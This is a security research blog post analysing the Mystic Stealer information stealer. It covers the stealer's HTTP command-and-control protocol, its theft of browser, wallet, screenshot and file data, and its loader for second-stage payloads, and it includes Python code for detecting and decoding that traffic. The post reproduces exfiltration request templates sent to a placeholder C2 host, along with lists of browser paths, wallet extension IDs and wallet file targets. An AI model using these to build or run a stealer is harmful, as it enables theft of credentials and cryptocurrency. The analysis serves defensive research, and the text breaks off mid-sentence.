URL: https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited
MYSTIC STEALER REVISITED

JAVIER VICENTE - Sr. Staff Security Researcher
October 25, 2023 - 21 min read





Contents

 1. Introduction
 2. Key Takeaways
 3. Technical Analysis
 4. Communications
 5. Conclusion
 6. Cloud Sandbox
 7. Indicators of Compromise (IoCs)
 8. Appendix
 9. More blogs




INTRODUCTION

Mystic Stealer is a relatively new downloader and information stealer that
emerged in early 2023. The malware harvests data from a large number of web
browsers and cryptocurrency wallet applications. Mystic can also be used to
steal Steam game credentials and arbitrary files from an infected system. Mystic
stands out for its level of obfuscation and for the improvements made with each
new version of the malware. The code continues to evolve and expand the data
theft capabilities, and the network communication was updated from a custom
binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be
due to Mystic Stealer failing to beacon back to a C2 server in corporate
environments, which frequently block network traffic on non-standard ports. The
new modifications have led to increased popularity with criminal threat actors
leveraging its loader functionality to distribute additional malware families
including RedLine, DarkGate, and GCleaner.

In this blog, we will analyze the latest updates to Mystic Stealer as a
follow-up to our previous report.


KEY TAKEAWAYS

 * Mystic Stealer is an information stealer that was first advertised in April
   2023, which targets nearly 40 web browsers and more than 70 browser
   extensions.
 * Mystic Stealer has been regularly updated with improvements to its code
   obfuscation, configuration, and methods of communication.
 * The malware’s command and control (C2) communications have been updated from
   a custom encrypted binary protocol to HTTP.
 * Mystic Stealer has added loader functionality in recent versions to
   complement its information stealing abilities.
 * Mystic Stealer has been used by numerous threat groups that leverage it to
   distribute second-stage malware payloads including RedLine, DarkGate, and
   GCleaner.


TECHNICAL ANALYSIS

The latest variant of Mystic Stealer has introduced some notable changes in both
the behavior of the malware and in the obfuscation. The entry point of the
malware is very similar to the older variant. The malware exits if the current
date is older than a specific hardcoded date. Figure 1 shows a comparison of the
main function between the previous variant and the current variant.

Figure 1: Comparison of the WinMain function for the current and previous Mystic
variants

In the latest variant of Mystic Stealer, the decryption of the malware C2s has
been moved to a sub-function that is executed after the expiration date check
(probably to avoid leaking the C2s in memory if this time check fails).


EMBEDDED C2 CONFIGURATION

The algorithm used to decrypt the list of C2s is the same custom XTEA-based
algorithm as in the previous variant. However, after the custom XTEA layer has
been decrypted, the result is a sequence of HTTP C2s separated by a “|”
delimiter. The C2 path is stored among the list of obfuscated strings that are
constructed and decoded on the stack, as shown in Figure 2.

Figure 2: Mystic Stealer C2 path obfuscation


INFORMATION STEALING CONFIGURATION

In the previous Mystic Stealer variant, the target lists for web browsers,
extensions (and their IDs), and cryptocurrency applications were embedded and
obfuscated in the malware. In recent versions, the application target list is
now downloaded from the C2 server instead of being hardcoded, as we will examine
in the following section.


COMMUNICATIONS

In the latest Mystic Stealer variant, all communications between the infected
system and the C2 server are performed using HTTP POST requests. Unlike the
previous variant that used RC4 to encrypt a custom binary TCP-based protocol,
the latest variant does not implement any form of encryption. The data sent in
the POST query is Base64 encoded, as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="<name>"

BASE64(<data>)
--<boundary>


--------------------------------------------------------------------------------

The response data from the server is also encoded in Base64. The response starts
with “OK\r\n” and is followed by any data returned by the C2 server for the
specific query.

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <rest of data for the specific command, if necessary>)

--------------------------------------------------------------------------------
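The fixed path, User-Agent and all-Base64 multipart fields described above are what a defender can key on in proxy or packet captures. The following is an added example (not code from the original post or from ThreatLabz): it parses a raw HTTP request, extracts and decodes the multipart fields, and scores the request against those traits using the field names (hwid, build, msg, token, filename, file) documented in the sections that follow. The sample requests, boundary and host addresses are constructed.

```python
import base64
import binascii
import re

# Traits of the Mystic Stealer HTTP C2 traffic described on this page.
MYSTIC_PATH = "/loghub/master"
MYSTIC_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
MYSTIC_FIELDS = {"hwid", "build", "msg", "token", "filename", "file"}


def _b64_decode(value):
    """Strict Base64 decode; None if the value is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body, content_type):
    """Return {field_name: raw_value} for a multipart/form-data body."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    fields = {}
    for part in body.split("--" + match.group(1)):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble or closing delimiter
            continue
        part_head, _, part_body = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = part_body.strip("\r\n")
    return fields


def inspect_request(raw):
    """Score a captured request against the traits above and decode its fields."""
    method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    fields = parse_multipart(body, ctype) if method == "POST" else {}
    decoded = {k: _b64_decode(v) for k, v in fields.items()}
    indicators = {
        "c2_path": path == MYSTIC_PATH,
        "c2_user_agent": headers.get("user-agent") == MYSTIC_UA,
        "multipart_post": method == "POST" and ctype.startswith("multipart/form-data"),
        "known_field_names": bool(fields) and set(fields) <= MYSTIC_FIELDS,
        # the bot Base64-encodes every field value, which ordinary form posts rarely do
        "all_fields_base64": bool(fields) and all(v is not None for v in decoded.values()),
    }
    readable = {k: (v.decode("utf-8", "replace") if v is not None else None)
                for k, v in decoded.items()}
    return {"score": sum(indicators.values()), "indicators": indicators, "fields": readable}


def _b64(text):
    return base64.b64encode(text.encode()).decode()


BOUNDARY = "----constructed-boundary"


def _multipart(fields):
    """Constructed helper: lay out fields the way the bot does."""
    parts = []
    for name, value in fields:
        parts += ["--" + BOUNDARY, 'Content-Disposition: form-data; name="%s"' % name, "", value]
    return "\r\n".join(parts + ["--" + BOUNDARY + "--", ""])


# Constructed registration request following the layout shown above (not a real capture).
SAMPLE_REGISTRATION = "\r\n".join([
    "POST /loghub/master HTTP/1.1",
    "Content-Type: multipart/form-data; boundary=" + BOUNDARY,
    "User-Agent: " + MYSTIC_UA, "Host: 192.0.2.10", "",
    _multipart([("hwid", _b64("0123456789ABCDEF123456")), ("build", _b64("botnet_id"))]),
])

# Constructed benign multipart upload for contrast.
SAMPLE_BENIGN = "\r\n".join([
    "POST /upload HTTP/1.1",
    "Content-Type: multipart/form-data; boundary=" + BOUNDARY,
    "User-Agent: curl/8.0.1", "Host: files.example.test", "",
    _multipart([("comment", "hello world, not base64!")]),
])

if __name__ == "__main__":
    for sample in (SAMPLE_REGISTRATION, SAMPLE_BENIGN):
        print(inspect_request(sample))
```

The score alone is a triage aid; the decoded fields are what let an analyst confirm a hit (a hwid/build pair, or a msg naming one of the target lists) rather than alert on the User-Agent string by itself.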

 


REGISTRATION

The infected system (bot) starts communication with the C2 server by sending a
POST request with data containing a variable named hwid, which includes a Base64
encoded bot ID generated based on information from the victim’s machine. A
second variable with the name build contains the botnet ID, a value that is
hardcoded in the binary of the malware. Once the C2 receives these initial two
packets, the bot is registered.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="hwid"

BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"

BASE64(botnet_id)
--<boundary>--

--------------------------------------------------------------------------------

The C2 server generates and returns a session token (a 64 byte lowercase
hexadecimal string) that is used in subsequent packets, together with a set of
binary flags that indicate which actions should be performed (take a
screenshot, steal browser credentials, steal cryptocurrency wallets, etc.).

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)

--------------------------------------------------------------------------------

When the bot submits information to the C2 server, it sends a POST request with:

 * A filename variable containing the name of the file being submitted, Base64
   encoded
 * A file variable with the content of the file, also Base64 encoded
 * A token variable with the session token from the registration request

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of example.txt>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

If the request is valid, the server answers with an OK response.

After registration, the bot sends information about the infected system via a
file named SystemInformation.txt that contains information similar to the
following:

--------------------------------------------------------------------------------

Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64

Available KeyboardLayouts: 
English (United States)

Hardwares: 
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll


--------------------------------------------------------------------------------

 


INFORMATION STEALING

Once Mystic Stealer has registered and reported the infected system information,
the binary flags from the C2 server determine whether to conduct data theft and
load additional malware payloads. Mystic Stealer sends HTTP POST requests for
specific target lists by specifying the value in a msg variable.

BROWSERS

Depending on the configuration, Mystic Stealer will steal data from
Chromium-based browsers by first requesting a target list from the C2 server.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The Mystic Stealer C2 server will respond with a list of Chromium-based browsers
to target. The Appendix section shows the full list of browsers that have been
targeted.

--------------------------------------------------------------------------------

Citrio|%localappdata%\CatalinaGroup\Citrio\User Data|Coowon|%localappdata%\Coowon\Coowon\User Data|Liebao|%localappdata%\liebao\User Data|QIP Surf|%localappdata%\QIP Surf\User Data|Orbitum|%localappdata%\Orbitum\User Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User Data|Amigo|%localappdata%\Amigo\User\User Data|Torch|%localappdata%\Torch\User Data|Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data|Comodo|%localappdata%\Comodo\User Data|360Browser|%localappdata%\360Browser\Browser\User Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...

--------------------------------------------------------------------------------

Each element of the list contains the name of the browser and the path where the
browser’s data is stored: 

--------------------------------------------------------------------------------

Browser name 1|Browser path 1|...|Browser name N|Browser path N

--------------------------------------------------------------------------------

Mystic Stealer also retrieves a list of browser extensions to target.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

The Mystic Stealer C2 server will return the browser extensions configuration.

--------------------------------------------------------------------------------

Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddojjnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...


--------------------------------------------------------------------------------

In this case, each element contains the name of the extension and the ID.

--------------------------------------------------------------------------------

Extension name 1|Extension ID 1|....|Extension name N|Extension ID N

--------------------------------------------------------------------------------

Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server.
This library is used to parse web browser SQLite database files.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

The response is the sqlite3 DLL Base64 encoded, as shown below:

--------------------------------------------------------------------------------

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK BASE64(<sqlite3 file>))


--------------------------------------------------------------------------------

The stolen browser data (if any) is sent to the C2 server. For example, cookies
stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as
shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Microsoft_Edge_Default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

Depending on the configuration, Mystic Stealer will also retrieve a list of
Gecko-based browsers to target.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The configuration format is identical to the chromium-browsers list.

--------------------------------------------------------------------------------

Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles|Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mozilla\icecat\Profiles

--------------------------------------------------------------------------------

Mystic Stealer will collect a number of database files from Firefox-based
browsers containing cookies, certificates, keys, etc., as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

--------------------------------------------------------------------------------

If the browser history configuration flag (position 4) is set to 1, Mystic
Stealer also sends the victim’s browsing history.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

The browser history file contains the website title (if available) and the URL
as shown below:

--------------------------------------------------------------------------------

Title: <Title1>
Url: <url1>

===============

Title: <Title2>
Url: <url2>

===============

...

===============

Title: <TitleN>
Url: <urlN>

===============

--------------------------------------------------------------------------------

 

SCREENSHOTS

If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer
captures and sends a screenshot of the victim’s desktop.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Screenshot.jpeg>)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

--------------------------------------------------------------------------------

 

FILES

Mystic Stealer also downloads a list of files to be stolen from the victim.

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--


--------------------------------------------------------------------------------

The Mystic Stealer C2 server returns a list of target files and directories to
steal. For example, ThreatLabz has observed this feature used to steal
cryptocurrency wallets as shown below:

--------------------------------------------------------------------------------

Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0|Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0|Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1|Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0|Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereum|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0|Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0

--------------------------------------------------------------------------------

The format for each targeted file is shown below:

--------------------------------------------------------------------------------

Directory name|Location on disk|Target files mask|Flag

--------------------------------------------------------------------------------

The flag parameter indicates whether Mystic Stealer should recursively search
the target directory. Once finished, the bot sends a “done” msg to indicate that
the file stealing task is complete.

LOADER

A “loader” msg can be sent by Mystic Stealer to the C2 server to request
additional second-stage malware payloads, as shown below:

--------------------------------------------------------------------------------

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))


--------------------------------------------------------------------------------

The response to the loader request is an initial Base64 encoded layer containing
an OK response with a set of one or more Base64 encoded executables:



Figure 3: Base64 encoded executables downloaded by Mystic Stealer

The packet follows this format:

--------------------------------------------------------------------------------

|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)

--------------------------------------------------------------------------------

The parameter that precedes the Base64 encoded executable does not appear to be
currently used, although it may indicate a potential feature that has yet to be
implemented such as whether to write the binary to disk or inject it into
another process. After downloading and executing these binary payloads, Mystic
Stealer sends a final POST request with the message “loadercode”. The C2 server
will then return an empty response.
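To make the exchange above concrete from the defender's side, here is an added example (not code from the post or from the malware) that filters a request on the fixed URI and User-Agent shown above, decodes the Base64 `msg` and `token` form fields, strips the outer Base64 layer of the loader response, splits out each `|1|BASE64(exe)|` record and hashes the payloads while checking for a PE `MZ` header. It assumes the multipart layout and response shape exactly as the post renders them; the request, response and the two stand-in "executables" are constructed here and are not real binaries.

```python
"""Decode one Mystic Stealer 'loader' exchange and triage the returned payloads.

Added example for analysts; not code from the Zscaler post or from the malware.
Assumes the multipart layout and the BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)|...)
response shape as rendered in the post. The sample request, response and the
two 'executables' below are constructed stand-ins, not real files.
"""
import base64
import hashlib
import re
from typing import Dict, List, Tuple

BEACON_PATH = "/loghub/master"
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"


def looks_like_beacon(request_line: str, headers: Dict[str, str]) -> bool:
    """Cheap first-pass filter on the fixed URI and User-Agent of the beacon."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    return parts[0] == "POST" and parts[1] == BEACON_PATH \
        and headers.get("User-Agent", "") == BEACON_UA


def parse_multipart_fields(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: raw value} from a simple multipart/form-data body."""
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":            # preamble or closing marker
            continue
        headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', headers)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def decode_beacon_fields(fields: Dict[str, bytes]) -> Dict[str, str]:
    """Every form field the stealer sends is Base64 text."""
    return {k: base64.b64decode(v).decode() for k, v in fields.items()}


def parse_loader_response(body: bytes) -> List[Tuple[str, bytes]]:
    """Strip the outer Base64 layer, check 'OK', return [(param, payload bytes)]."""
    inner = base64.b64decode(body)
    if not inner.startswith(b"OK"):
        raise ValueError("not an OK loader response")
    # records are '|'-separated pairs of (param, Base64(exe)); blanks are separators
    tokens = [t.strip() for t in inner[2:].split(b"|") if t.strip()]
    if len(tokens) % 2:
        raise ValueError("unpaired field in loader response")
    return [(p.decode(), base64.b64decode(b)) for p, b in zip(tokens[::2], tokens[1::2])]


def triage_payloads(payloads: List[Tuple[str, bytes]]) -> List[dict]:
    """Hash each dropped payload and flag whether it carries a PE (MZ) header."""
    return [{"param": p, "size": len(b), "is_pe": b[:2] == b"MZ",
             "sha256": hashlib.sha256(b).hexdigest()} for p, b in payloads]


def decode_exchange(request_body: bytes, boundary: str, response_body: bytes) -> dict:
    """Decode the beacon fields and, for a 'loader' msg, the payloads returned."""
    fields = decode_beacon_fields(parse_multipart_fields(request_body, boundary))
    payloads = []
    if fields.get("msg") == "loader":
        payloads = triage_payloads(parse_loader_response(response_body))
    return {"msg": fields.get("msg"), "token": fields.get("token"), "payloads": payloads}


# --- constructed sample exchange (stand-in values, not captured traffic) ---
def build_sample_request(boundary: str, msg: bytes, token: bytes) -> bytes:
    b = boundary.encode()
    parts = []
    for name, value in ((b"msg", msg), (b"token", token)):
        parts.append(b"--" + b + b'\r\nContent-Disposition: form-data; name="' + name
                     + b'"\r\n\r\n' + base64.b64encode(value) + b"\r\n")
    return b"".join(parts) + b"--" + b + b"--\r\n"


def build_sample_response(payloads: List[bytes]) -> bytes:
    records = b" ".join(b"|1|" + base64.b64encode(p) + b"|" for p in payloads)
    return base64.b64encode(b"OK " + records)


FAKE_PE = b"MZ" + b"\x90" * 62      # stand-in bytes with an MZ header, not a real PE
FAKE_BLOB = b"just some bytes"      # second stand-in payload, deliberately not a PE
SAMPLE_BOUNDARY = "ExampleBoundary"
SAMPLE_REQUEST = build_sample_request(SAMPLE_BOUNDARY, b"loader", b"EXAMPLE-TOKEN")
SAMPLE_RESPONSE = build_sample_response([FAKE_PE, FAKE_BLOB])

if __name__ == "__main__":
    print(decode_exchange(SAMPLE_REQUEST, SAMPLE_BOUNDARY, SAMPLE_RESPONSE))
```

Run against a proxy or sandbox capture, `decode_exchange` yields the bot token and a hash for every second-stage binary the C2 handed out, which is the list you need to pivot on in endpoint telemetry; `looks_like_beacon` is only a triage filter, since the URI and User-Agent are attacker-controlled and may change between builds.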


DEBUG BUILDS

Zscaler ThreatLabz has found recent samples compiled in September and October
2023, which contain plaintext strings that typically are obfuscated in other
samples:

Figure 4: Mystic Stealer debug version plaintext strings

In addition, these samples contain string references to the original C++ source
with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in
